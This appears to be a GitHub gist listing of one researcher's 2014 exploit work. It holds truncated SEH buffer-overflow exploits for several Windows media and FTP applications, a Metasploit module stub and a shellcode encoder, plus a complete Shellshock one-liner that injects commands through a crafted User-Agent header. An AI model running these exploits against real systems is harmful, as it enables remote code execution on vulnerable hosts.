
Muhamad Fadzil Ramli mfadzilr

@mfadzilr
mfadzilr / http_file_server_cmd_exec.rb
Last active August 29, 2015 14:06
HFS metasploit cmdstager
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
@mfadzilr
mfadzilr / test_shellshock
Last active August 29, 2015 14:06
Shellshock cmdline version
while true; do read -p 'pawned>' cmd; cmd="$cmd"; curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/bin/$cmd" "http://localhost/cgi-bin/hello"; done
@mfadzilr
mfadzilr / bin2hex.rb
Last active August 29, 2015 14:08
Binary to hex
#!/usr/bin/env ruby
# Author : Muhamad Fadzil Ramli
# 25/10/2014
# Binary to hexcode
# read bin file
fp = File.open(ARGV[0],"rb")
# read and convert to hex format
# (the gist preview ends at the def line; the body below is a minimal
#  completion that prints each byte as \xNN, as the comment above describes)
def readfile(fp)
  fp.each_byte { |b| print format("\\x%02x", b) }
  puts
end
readfile(fp)
fp.close
@mfadzilr
mfadzilr / freewma-seh-dep-bypass.rb
Created November 12, 2014 08:40
FreeWMA SEH DEP Bypass Exploit
#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)
seh = 4104
stackpivot = 88
buf = "A" * 5000
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 2.7.3.700 2006.09.29 (.wax) Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: ??
# Software Link: not available
# Version: 2.7.3.700 2006.09.29
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]
@mfadzilr
mfadzilr / bpftpclient-seh.rb
Created December 3, 2014 10:05
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
@mfadzilr
mfadzilr / advanview-seh.rb
Created December 9, 2014 14:59
Advantech AdamView (.gni) SEH Buffer Overflow
#!/usr/bin/env ruby
# Exploit Title: Advantech AdamView (.gni) SEH Buffer Overflow
# Date: Dec 09 2014
# Vulnerability Discovery: Daniel Kazimirow and Fernando Paez - Core Security
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-179WGW
# Version: 4.30.003
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-8386
# Advisory ID: CORE-2014-0008
@mfadzilr
mfadzilr / bpftpclient-seh-exploit.rb
Created December 9, 2014 15:17
BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit v2
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd
@mfadzilr
mfadzilr / encoder.rb
Last active May 26, 2018 10:58
Custom shellcode encoder
#!/usr/bin/env ruby
# Custom encoder for ADAMView Exploit
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 09/12/2014
# code is ugly
require 'metasm'
@shellcode = Array.new()